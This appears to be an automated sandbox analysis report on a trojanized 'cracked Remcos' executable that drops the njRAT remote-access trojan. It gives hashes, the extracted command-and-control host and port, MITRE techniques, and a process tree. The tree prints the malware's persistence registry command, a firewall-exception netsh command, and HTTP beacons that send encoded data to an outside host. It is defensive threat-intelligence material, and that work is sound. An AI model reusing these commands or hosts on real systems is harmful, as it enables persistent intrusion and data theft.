njrat | bdb96b7a1a75fa4f56d1b1f922d80f029c12df21df49cbbfd1f2a3175d604195

Resubmissions

21/02/2025, 18:31 UTC

250221-w6e2asxpbm 10

21/02/2025, 17:35 UTC

250221-v6f3xswrbm 10

Analysis

max time kernel
29s
max time network
28s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
21/02/2025, 18:31 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe
Size

17.7MB
MD5

efc159c7cf75545997f8c6af52d3e802
SHA1

b85bd368c91a13db1c5de2326deb25ad666c24c1
SHA256

898ac001d0f6c52c1001c640d9860287fdf30a648d580e9f5dd15e2ef84ab18e
SHA512

d06a432233dceb731defd53238971699fef201d0f9144ee50e5dd7d6620dfdd6c298d52618bf2c9feb0519574f4565fb0177b00fd8292768fbd8b85dd11e650d
SSDEEP

393216:GYuGvp8EHb+in8f4Zg41+Q4AXf5ZZcyfHDMxVpSc+q+eOFxdx:3mqSi8fN4sAXfrZcyfo7p0eYHx

Score

10^/10

njrat hacked defense_evasion discovery persistence privilege_escalation trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

dllsys.duckdns.org:3202

Mutex

3b570ffeeb3d34249b9a5ce0ee58a328

Attributes

reg_key
3b570ffeeb3d34249b9a5ce0ee58a328
splitter
svchost

Signatures

Njrat family
njrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1916	netsh.exe

Executes dropped EXE 2 IoCs

pid	Process
3584	Remcos Professional Cracked By Alcatraz3222.exe
548	taskhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3584	Remcos Professional Cracked By Alcatraz3222.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3976 set thread context of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Remcos Professional Cracked By Alcatraz3222.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Remcos Professional Cracked By Alcatraz3222.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

Modifies registry class 27 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c00434653461600310000000000515a35a6120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe515a35a6555a05942e00000063570200000001000000000000000000000000000000b10a9b004100700070004400610074006100000042000000	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 5000310000000000515a46a910004c6f63616c003c0009000400efbe515a35a6555a05942e00000077570200000001000000000000000000000000000000025da0004c006f00630061006c00000014000000	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Remcos Professional Cracked By Alcatraz3222.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = ffffffff	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e00310000000000555a0a94100054656d7000003a0009000400efbe515a35a6555a0a942e000000785702000000010000000000000000000000000000007ec00b01540065006d007000000014000000	Remcos Professional Cracked By Alcatraz3222.exe
Key created	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Remcos Professional Cracked By Alcatraz3222.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 6800310000000000555a0c9410004255494c44457e310000500009000400efbe555a0c94555a0c942e0000005fad0200000019000000000000000000000000000000f7fdc8004200750069006c00640065007200500072006f00660069006c0065007300000018000000	Remcos Professional Cracked By Alcatraz3222.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3517169085-2802914951-552339849-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "1"	Remcos Professional Cracked By Alcatraz3222.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3976	Remcos Professional Cracked By Alcatraz3222.exe
3584	Remcos Professional Cracked By Alcatraz3222.exe
3584	Remcos Professional Cracked By Alcatraz3222.exe
3584	Remcos Professional Cracked By Alcatraz3222.exe
3584	Remcos Professional Cracked By Alcatraz3222.exe
3976	Remcos Professional Cracked By Alcatraz3222.exe
3976	Remcos Professional Cracked By Alcatraz3222.exe
3976	Remcos Professional Cracked By Alcatraz3222.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3976	Remcos Professional Cracked By Alcatraz3222.exe
Token: SeDebugPrivilege	548	taskhost.exe
Token: 33	548	taskhost.exe
Token: SeIncBasePriorityPrivilege	548	taskhost.exe
Token: 33	548	taskhost.exe
Token: SeIncBasePriorityPrivilege	548	taskhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3584	Remcos Professional Cracked By Alcatraz3222.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3584	Remcos Professional Cracked By Alcatraz3222.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3584	Remcos Professional Cracked By Alcatraz3222.exe
3584	Remcos Professional Cracked By Alcatraz3222.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 3584	3976	Remcos Professional Cracked By Alcatraz3222.exe	82
PID 3976 wrote to memory of 3584	3976	Remcos Professional Cracked By Alcatraz3222.exe	82
PID 3976 wrote to memory of 3584	3976	Remcos Professional Cracked By Alcatraz3222.exe	82
PID 3976 wrote to memory of 4488	3976	Remcos Professional Cracked By Alcatraz3222.exe	83
PID 3976 wrote to memory of 4488	3976	Remcos Professional Cracked By Alcatraz3222.exe	83
PID 3976 wrote to memory of 4488	3976	Remcos Professional Cracked By Alcatraz3222.exe	83
PID 3976 wrote to memory of 3024	3976	Remcos Professional Cracked By Alcatraz3222.exe	85
PID 3976 wrote to memory of 3024	3976	Remcos Professional Cracked By Alcatraz3222.exe	85
PID 3976 wrote to memory of 3024	3976	Remcos Professional Cracked By Alcatraz3222.exe	85
PID 3024 wrote to memory of 2044	3024	cmd.exe	87
PID 3024 wrote to memory of 2044	3024	cmd.exe	87
PID 3024 wrote to memory of 2044	3024	cmd.exe	87
PID 3976 wrote to memory of 1920	3976	Remcos Professional Cracked By Alcatraz3222.exe	88
PID 3976 wrote to memory of 1920	3976	Remcos Professional Cracked By Alcatraz3222.exe	88
PID 3976 wrote to memory of 1920	3976	Remcos Professional Cracked By Alcatraz3222.exe	88
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 3976 wrote to memory of 548	3976	Remcos Professional Cracked By Alcatraz3222.exe	90
PID 548 wrote to memory of 1916	548	taskhost.exe	91
PID 548 wrote to memory of 1916	548	taskhost.exe	91
PID 548 wrote to memory of 1916	548	taskhost.exe	91

C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos Professional Cracked By Alcatraz3222.exe
"C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos Professional Cracked By Alcatraz3222.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe
  "C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3584
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe" "%temp%\Profile Remcos\Update_Lock_Remcos.exe" /Y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4488
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%temp%\Profile Remcos\Update_Lock_Remcos.exe.lnk" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Profile Remcos\Update_Lock_Remcos.exe.lnk" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\Profile Remcos\Update_Lock_Remcos.exe:Zone.Identifier
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1920
- C:\Users\Admin\AppData\Local\Temp\taskhost.exe
  "C:\Users\Admin\AppData\Local\Temp\taskhost.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\taskhost.exe" "taskhost.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1916

Network

DNS

breakingsec02.co.nf

Remcos Professional Cracked By Alcatraz3222.exe

Remote address:

8.8.8.8:53

Request

breakingsec02.co.nf

IN A

Response

breakingsec02.co.nf

IN CNAME

91498.bodis.com

91498.bodis.com

IN A

199.59.243.228
DNS

8.8.8.8.in-addr.arpa

Remcos Professional Cracked By Alcatraz3222.exe

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

dllsys.duckdns.org

Remcos Professional Cracked By Alcatraz3222.exe

Remote address:

8.8.8.8:53

Request

dllsys.duckdns.org

IN A

Response

dllsys.duckdns.org

IN A

84.220.8.178
DNS

dllsys.duckdns.org

Remcos Professional Cracked By Alcatraz3222.exe

Remote address:

8.8.8.8:53

Request

dllsys.duckdns.org

IN A

Response

dllsys.duckdns.org

IN A

84.220.8.178
GET

http://breakingsec02.co.nf/Remcos/upd_free.txt

Remcos Professional Cracked By Alcatraz3222.exe

Remote address:

199.59.243.228:80

Request

GET /Remcos/upd_free.txt HTTP/1.1
User-Agent: REMCOS
Host: breakingsec02.co.nf
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

date: Fri, 21 Feb 2025 18:32:19 GMT
content-type: text/html; charset=utf-8
content-length: 1086
x-request-id: 7ba521be-7ee6-492d-b38a-ff8226985c31
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Q9tWON6xJOhM/gmfLyztOYqHCXUUH02QeHHTvshYw/jwYIOjvFAmWfVR32l39xkIwPjNLjgAujOhOAKSmmRWmg==
set-cookie: parking_session=7ba521be-7ee6-492d-b38a-ff8226985c31; expires=Fri, 21 Feb 2025 18:47:19 GMT; path=/
GET

http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53

Remcos Professional Cracked By Alcatraz3222.exe

Remote address:

199.59.243.228:80

Request

GET /Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53 HTTP/1.1
User-Agent: REMCOS
Host: breakingsec02.co.nf
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

date: Fri, 21 Feb 2025 18:32:19 GMT
content-type: text/html; charset=utf-8
content-length: 1310
x-request-id: 6e58ae23-e034-4eda-9f22-ff8bd12d0282
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OCJLnlCnnm9Z2QfXZafji9TuGsNddj5776lO8Pt0jCVgJS9dZEaKQrofNwYprbMHhp4v21TMIrzaFR1DIQ2D9A==
set-cookie: parking_session=6e58ae23-e034-4eda-9f22-ff8bd12d0282; expires=Fri, 21 Feb 2025 18:47:19 GMT; path=/

199.59.243.228:80

http://breakingsec02.co.nf/Remcos/upd_free.txt

http

Remcos Professional Cracked By Alcatraz3222.exe

483 B
2.5kB
8
5

HTTP Request

GET http://breakingsec02.co.nf/Remcos/upd_free.txt

HTTP Response

200
199.59.243.228:80

http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53

http

Remcos Professional Cracked By Alcatraz3222.exe

560 B
2.2kB
8
4

HTTP Request

GET http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53

HTTP Response

200
84.220.8.178:3202

dllsys.duckdns.org

taskhost.exe

208 B
4

8.8.8.8:53

breakingsec02.co.nf

dns

Remcos Professional Cracked By Alcatraz3222.exe

259 B
360 B
4
4

DNS Request

breakingsec02.co.nf

DNS Response

199.59.243.228

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

dllsys.duckdns.org

DNS Request

dllsys.duckdns.org

DNS Response

84.220.8.178

DNS Response

84.220.8.178

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Profile Remcos\Update_Lock_Remcos.exe

Filesize
17.7MB

MD5
efc159c7cf75545997f8c6af52d3e802

SHA1
b85bd368c91a13db1c5de2326deb25ad666c24c1

SHA256
898ac001d0f6c52c1001c640d9860287fdf30a648d580e9f5dd15e2ef84ab18e

SHA512
d06a432233dceb731defd53238971699fef201d0f9144ee50e5dd7d6620dfdd6c298d52618bf2c9feb0519574f4565fb0177b00fd8292768fbd8b85dd11e650d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe

Filesize
17.4MB

MD5
c3c21fa4c2186deb641455482ab0d3aa

SHA1
2f4b49e8383e073ccb965943ce970de403412567

SHA256
4ea203509d0fdff3e31f976413c546ca3d36133bc708e9a1301860961cc3a8d9

SHA512
31db2963f1bd49f7b4a6ee38e54940d20120d6c05ef7bf34ec97eb93051bee6d5428e9e1271e4ae8f5544b824188ac7278315e2e2c27be302a312eebbf8c3fb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos_Settings.ini

Filesize
881B

MD5
a3468935e33e361cf94f4721ed4cb66d

SHA1
c3b19ca8382534b2179940cabede8c6c952a9c06

SHA256
b374af58c24b6085f64f979dab434643da39d0267a27975f396473327dc98c7d

SHA512
c1caa0b9637a46187d54b2952db204182fad5a5324574949ce4db13bdb17624ccd8b3228eb9b2bcfe5851add2c5d2f586945e7264b1d1cd02d91acf1fd81583a

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskhost.exe

Filesize
256KB

MD5
d10a3cfcc08aae3a7234498f213cf89e

SHA1
ccae4469a3a05fcb6e7af33019ca5357e5406dda

SHA256
0da56bd07a486818b7735761001cc1d3ca5af645f369a3c206bcb6719fefff06

SHA512
90a4a68b45113360d732ccac7698c74aa550c05d9883d287b808982800fce1a24abf69cf06b0f017babd647cafd3ca10aa894c59e6dab8ba1ff34c639bdf6427

Download Submit
memory/548-44-0x0000000005640000-0x000000000564A000-memory.dmp

Filesize
40KB

Download
memory/548-42-0x00000000056C0000-0x0000000005752000-memory.dmp

Filesize
584KB

Download
memory/548-39-0x0000000005B10000-0x00000000060B6000-memory.dmp

Filesize
5.6MB

Download
memory/548-34-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3584-17-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/3584-16-0x00000000031E0000-0x00000000031E1000-memory.dmp

Filesize
4KB

Download
memory/3584-23-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/3584-22-0x0000000000762000-0x000000000181E000-memory.dmp

Filesize
16.7MB

Download
memory/3584-20-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/3584-19-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/3584-18-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/3584-25-0x0000000000400000-0x0000000002991000-memory.dmp

Filesize
37.6MB

Download
memory/3584-21-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/3584-24-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/3584-43-0x0000000000762000-0x000000000181E000-memory.dmp

Filesize
16.7MB

Download
memory/3976-4-0x000000000DE40000-0x000000000EFC2000-memory.dmp

Filesize
17.5MB

Download
memory/3976-40-0x000000007474E000-0x000000007474F000-memory.dmp

Filesize
4KB

Download
memory/3976-41-0x0000000074740000-0x0000000074EF1000-memory.dmp

Filesize
7.7MB

Download
memory/3976-3-0x0000000074740000-0x0000000074EF1000-memory.dmp

Filesize
7.7MB

Download
memory/3976-0-0x000000007474E000-0x000000007474F000-memory.dmp

Filesize
4KB

Download
memory/3976-2-0x0000000006710000-0x00000000067AC000-memory.dmp

Filesize
624KB

Download
memory/3976-46-0x0000000074740000-0x0000000074EF1000-memory.dmp

Filesize
7.7MB

Download
memory/3976-1-0x0000000000A90000-0x0000000001C3E000-memory.dmp

Filesize
17.7MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.